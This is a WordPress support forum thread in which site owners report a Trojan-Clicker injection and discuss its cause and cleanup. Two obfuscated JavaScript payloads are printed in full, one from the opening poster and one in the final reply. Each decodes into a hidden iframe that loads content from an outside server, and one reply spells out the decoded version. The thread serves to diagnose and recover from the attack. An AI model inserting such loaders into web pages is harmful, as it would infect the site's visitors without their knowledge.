Support » Fixing WordPress » WordPress 2.5.1 and Trojan-Clicker.JS.Agent.h virus problem

  • Hi,

    I am using wordpres version 2.5.1 and today I got the following code injected into my 3 index.php file

    [code]
    <script>
    <!--
    var d=document,kol=561;
    function O10H485C8430B399A(H485C8430B42AA){ function H485C8430B498E() {var H485C8430B5183=16;return H485C8430B5183;} return( parseInt(H485C8430B42AA,H485C8430B498E()));}function H485C8430B597B(H485C8430B6173){ function H485C8430B7973() {var H485C8430B816D=2;return H485C8430B816D;} var H485C8430B696C='';for(H485C8430B7170=0; H485C8430B7170<H485C8430B6173.length; H485C8430B7170+=H485C8430B7973()){ H485C8430B696C += ( String.fromCharCode (O10H485C8430B399A(H485C8430B6173.substr(H485C8430B7170, H485C8430B7973()))));}return H485C8430B696C;} document.write(H485C8430B597B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313532383437292B273831303266333362375C272077696474683D363239206865696768743D323433207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E'));
    //-->
    </script>
    [/code]

    [Files]
    wp-admin/index.php
    wp-content/index.php
    /index.php
    [/files]

    In addition to the wordpress 2.5.1, I am using following plugins with their version mentioned below:-

    Plugin name Version
    Google XML Sitemaps 3.1.0.1
    Post-Plugin Library 2.5.0.6
    Robots Meta 3.0.2
    Similar Posts 2.5.0
    wp-cache 2.1.2
    WP-PageNavi 2.30
    WP-PostRatings 1.30
    WP-PostRatings Widget 1.30
    WP-Sticky 1.30
    WP Security Scan 2.3

    Anybody faced such problem earlier? does anybody know the reason behind this?and steps to prevent this happening in future?

    Thank you

Viewing 7 replies - 1 through 7 (of 7 total)
  • What theme are you using? Some themes do have security holes.

    Thread Starter itsnjm

    (@itsnjm)

    I am using tulip time theme [http://www.thesouthernhighlands.com.au/theme]

    Will someone like to help us out here?? I am also getting the same problem. Same code is injected into one of my sites. I removed it earlier today but now its inserted again. I am going to ask my host to have everything checked but some help from WordPress will be really appreciated.

    I am running a clean WP 2.5.1 installed and almost same set of plugins as given above.

    Help Please.

    Fastian, what plugins and theme are you using?

    What the java-script is actual doing is the following:

    var d=document;
    if(!myia) {
    d.write('
       <IFRAME name=O1 src=\'http://77.221.133.171/.if/go.html?'+Math.round(Math.random()*152847)+'8102f33b7\' width=629 height=243 style=\'display: none\'>');
    }
    var myia=true;

    This (russian?) server will give you another (more complicated) script, which purpose is not clear to me right now. Do not visit this site and do not run this java script!

    Hey guys,

    I’ve been hit with the same virus/hack. It was done on several of my sites including static and ecommerce sites. It’s not just a WP issue.

    I noticed that none of my local files were infected. I would upload clean copies and like you said, the hack would re-appear. After a lot of research, I switched all my FTP accounts.. I destroyed all users, I recreated my host control panel passwords from a computer with a fresh install, and then recreated all my FTP users with really really strong passwords. IT WORKED.

    I’ve got 3 computers at home, one of them is my web design biz machine, and I’m very suspicious that it’s been compromised. That’s how all my clients websites ended up with the virus.

    I’m not using the that computer anymore, I’ve installed new updated virus definitions on my other computers and carefully transfered all work files. I plan to wipe my biz comp and start fresh.

    This FTP hack can also be researched under “Iframe Hack”

    Sometimes the best answers are the simplest. I was concerned at first that it was the host, but it happened to sites that I had a a variety of hosts.. FTP programs do not encrypt logins and passwords. If you’ve got a trojan chances are your ftp was logged.

    Good Luck.
    Cris

    I get a similar problem and I have wordpress 2.7.1 installed and since yesterday my NOD32 reports a TrojanClicker.Iframe.NAO.gen

    and I notice that in the generated HTML I get the last line like this:

    <DIV id=main><script type="text/javascript">var hPLAmyvsdfELzjhpwQYf = "EOje60EOje105EOje102EOje114EOje97EOje109EOje101EOje32EOje119EOje105EOje100EOje116EOje104EOje61EOje34EOje52EOje56EOje48EOje34EOje32EOje104EOje101EOje105EOje103EOje104EOje116EOje61EOje34EOje54EOje48EOje34EOje32EOje115EOje114EOje99EOje61EOje34EOje104EOje116EOje116EOje112EOje58EOje47EOje47EOje116EOje114EOje97EOje102EOje102EOje105EOje99EOje45EOje114EOje101EOje115EOje111EOje117EOje114EOje99EOje101EOje115EOje46EOje99EOje110EOje47EOje111EOje114EOje100EOje101EOje114EOje47EOje105EOje110EOje46EOje99EOje103EOje105EOje63EOje50EOje34EOje32EOje115EOje116EOje121EOje108EOje101EOje61EOje34EOje98EOje111EOje114EOje100EOje101EOje114EOje58EOje48EOje112EOje120EOje59EOje32EOje112EOje111EOje115EOje105EOje116EOje105EOje111EOje110EOje58EOje114EOje101EOje108EOje97EOje116EOje105EOje118EOje101EOje59EOje32EOje116EOje111EOje112EOje58EOje48EOje112EOje120EOje59EOje32EOje108EOje101EOje102EOje116EOje58EOje45EOje53EOje48EOje48EOje112EOje120EOje59EOje32EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje59EOje32EOje102EOje105EOje108EOje116EOje101EOje114EOje58EOje112EOje114EOje111EOje103EOje105EOje100EOje58EOje68EOje88EOje73EOje109EOje97EOje103EOje101EOje84EOje114EOje97EOje110EOje115EOje102EOje111EOje114EOje109EOje46EOje77EOje105EOje99EOje114EOje111EOje115EOje111EOje102EOje116EOje46EOje65EOje108EOje112EOje104EOje97EOje40EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje61EOje48EOje41EOje59EOje32EOje45EOje109EOje111EOje122EOje45EOje111EOje112EOje97EOje99EOje105EOje116EOje121EOje58EOje48EOje34EOje62EOje60EOje47EOje105EOje102EOje114EOje97EOje109EOje101EOje62";var wyAIvMIOvBsdRDeECZxg = hPLAmyvsdfELzjhpwQYf.split("EOje");var EBrElZthpSMlQNtLZBZV = "";for (var DRzVVdaXDXEHYwLKVFrL=1; DRzVVdaXDXEHYwLKVFrL<wyAIvMIOvBsdRDeECZxg.length; DRzVVdaXDXEHYwLKVFrL++){EBrElZthpSMlQNtLZBZV+=String.fromCharCode(wyAIvMIOvBsdRDeECZxg[DRzVVdaXDXEHYwLKVFrL]);}var FmdulWQzUMVHZPWHWyXp = ""+EBrElZthpSMlQNtLZBZV+"";document.write(""+FmdulWQzUMVHZPWHWyXp+"")</script>

    Otherwise I see no changes and I was not doing any modification. I also tried to disable all plugin but there is no change. I did not find this code in any of the source files of main index or header or footer. How can I get rid of this?

    Thanks in advance!
    Peter

Viewing 7 replies - 1 through 7 (of 7 total)
  • The topic ‘WordPress 2.5.1 and Trojan-Clicker.JS.Agent.h virus problem’ is closed to new replies.